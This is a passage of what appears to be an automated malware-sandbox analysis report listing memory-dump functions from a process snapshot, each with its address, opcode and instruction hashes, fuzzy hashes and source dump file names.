                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 855807b9d11e2a277a2de89b346f1f1a631a6aed44b9566e1e50a339925aca16
                                                                                              • Instruction ID: a912a92037b4a9681608902c234b9613101c76b86c515ef74d9f7b6103a3a6ac
                                                                                              • Opcode Fuzzy Hash: 855807b9d11e2a277a2de89b346f1f1a631a6aed44b9566e1e50a339925aca16
                                                                                              • Instruction Fuzzy Hash: 09118271E0450E8BEB18DF94C8A46FEB7F2EF54704F500139D015962E5DF742A418B90
                                                                                              Function 00007FFD9BA92472 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0912bdab1e43f4413a90b70e5b8c39200c13237a2eef805531595383630852f9
                                                                                              • Instruction ID: aa3be45432c424def263fcc3b3323031a12f82204e32b1d6c275b1d2a18d077e
                                                                                              • Opcode Fuzzy Hash: 0912bdab1e43f4413a90b70e5b8c39200c13237a2eef805531595383630852f9
                                                                                              • Instruction Fuzzy Hash: 4F111531E0522D8EEB38DF95C8107FDB3B0EF55301F4111BAD04DA6292DAB86A84DF40
                                                                                              Function 00007FFD9BA988AA Relevance: .0, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b43a86111bde45692d3f3edc44e58c66cbf52d3c9ce4dad5b0b5d225f4fc4b6
                                                                                              • Instruction ID: 949bee5810b7208830796af4db1ddefffa681c914e4969c46504a918cbcbedf1
                                                                                              • Opcode Fuzzy Hash: 6b43a86111bde45692d3f3edc44e58c66cbf52d3c9ce4dad5b0b5d225f4fc4b6
                                                                                              • Instruction Fuzzy Hash: DC11A4B0A0962D8FDBA9DF58D890BACB7B4FB18300F1045E9E40EE3250DB706B809F40
                                                                                              Function 00007FFD9BAA3811 Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f0702ce146b00fa93329e657cbd8d3f91f598b9470fd81630b19fab946bd1a1f
                                                                                              • Instruction ID: 31e56e789d38c72d5dc2261651f7b7ce87970634a39a0777f84993c72a8018be
                                                                                              • Opcode Fuzzy Hash: f0702ce146b00fa93329e657cbd8d3f91f598b9470fd81630b19fab946bd1a1f
                                                                                              • Instruction Fuzzy Hash: BC011270E5F51D8AD774DB9584243FCF6F6EF4A301F111079C00EA25A2CE786B449A21
                                                                                              Function 00007FFD9BAA6648 Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 049d541c46ddef1fb37d4fc18a3894bf42c4fa5fcaed8b26367e435fa7ccd5fc
                                                                                              • Instruction ID: 17a446d662b1f8926edc96312a61379e162cd29bd5a7ca4ccdf1ee16c6903984
                                                                                              • Opcode Fuzzy Hash: 049d541c46ddef1fb37d4fc18a3894bf42c4fa5fcaed8b26367e435fa7ccd5fc
                                                                                              • Instruction Fuzzy Hash: 03F0F932A1EA4E4EFBBC9F68483A1B97AD1BF56700F05017DE85CC21A2DDB565148A41
                                                                                              Function 00007FFD9BA923E8 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ea815264b5bd8c9ece02e6f1ca92c33354d28f0a7f1ad0abdc8c5d4b3025aaa
                                                                                              • Instruction ID: 212161636199203564692cb72d8800c3240ce90942ce528918695075a60c5314
                                                                                              • Opcode Fuzzy Hash: 7ea815264b5bd8c9ece02e6f1ca92c33354d28f0a7f1ad0abdc8c5d4b3025aaa
                                                                                              • Instruction Fuzzy Hash: D0F05E31E6F62D89EB78DBD598216FDB274EF85200F411076D01EA30A2CDA82A44AF44
                                                                                              Function 00007FFD9BA90608 Relevance: .0, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 09b143912151e40a63d8632aef0ccd098401b636e45d6f6728eadb350619936b
                                                                                              • Instruction ID: 7853c4f87e1ca98437f70e515cd87b6f09d20124f6816db5e5a296e697f4d2e6
                                                                                              • Opcode Fuzzy Hash: 09b143912151e40a63d8632aef0ccd098401b636e45d6f6728eadb350619936b
                                                                                              • Instruction Fuzzy Hash: 00F06530A1A74E8BEB6CAFA484246FA72A4FF04305F41087AE81ED11E1DF746254DA40
                                                                                              Function 00007FFD9BAA0F67 Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0acda555214692ac8fe6f9ddf2a34eb1c2972b01ed73c468678517ee20d8890c
                                                                                              • Instruction ID: cea6b1ab3dae309fcb21fda9ccd80dbcf06ef76d4ab867435a79568a28f27551
                                                                                              • Opcode Fuzzy Hash: 0acda555214692ac8fe6f9ddf2a34eb1c2972b01ed73c468678517ee20d8890c
                                                                                              • Instruction Fuzzy Hash: ABF01D30A0861ECFDB349F80C864BEC73B2EB54301F01022AC01EAB290DBB86904DB55
                                                                                              Function 00007FFD9BA927A8 Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 617065dceb0c14d91217e5087ab8e2e2501626b7ac2598fa3969a0b1f9100773
                                                                                              • Instruction ID: 8284c9bd151ef314f30a4da1611b55688a49fec7c8ee195bbeaa711107e46639
                                                                                              • Opcode Fuzzy Hash: 617065dceb0c14d91217e5087ab8e2e2501626b7ac2598fa3969a0b1f9100773
                                                                                              • Instruction Fuzzy Hash: B9F0A73091A64E8BDB6CAF6484245F977A0FF05305F01057DE81DD10D1DF74A654CA40
                                                                                              Function 00007FFD9BA91750 Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6cf9797388896da03f38a9e074d656f7ccc1dac019205c0e4e67546ed29bc1c
                                                                                              • Instruction ID: 2d404d0f385780b2f94925828ec620687aec74126969e2a39e8aa431e04649f0
                                                                                              • Opcode Fuzzy Hash: d6cf9797388896da03f38a9e074d656f7ccc1dac019205c0e4e67546ed29bc1c
                                                                                              • Instruction Fuzzy Hash: 16E06D20F0B60A5AFA385BD8849563561D19F54304FBA8274E01CCA1F2E9AAEEC2E200
                                                                                              Function 00007FFD9BAA0B5E Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9da5e1ffa388687cd2fd3595f9eeec38944cc46ed973a454124aea574549b4f7
                                                                                              • Instruction ID: 2f7f149f0e1576bbbd2f25207d0450fef33cf33e2a733a9e4f2ce903292206d5
                                                                                              • Opcode Fuzzy Hash: 9da5e1ffa388687cd2fd3595f9eeec38944cc46ed973a454124aea574549b4f7
                                                                                              • Instruction Fuzzy Hash: 51E06D30A0871ECFDB28EF80C8A0AED73B2FB50301F01022AC40EAB295DBB46904CB45
                                                                                              Function 00007FFD9BA92C48 Relevance: .0, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0c6d7846cca5650fa6c59bf40d336189f7b0d698bef0b8cfdc959be604572c7
                                                                                              • Instruction ID: 106d6a254387bc8b68d07f6ab9542f7395d98b629a401900fff6fdeefacdd2aa
                                                                                              • Opcode Fuzzy Hash: e0c6d7846cca5650fa6c59bf40d336189f7b0d698bef0b8cfdc959be604572c7
                                                                                              • Instruction Fuzzy Hash: 3B90020150D19206D225A56C28714D56A400E1512E6184AABE4D9080C7580410848145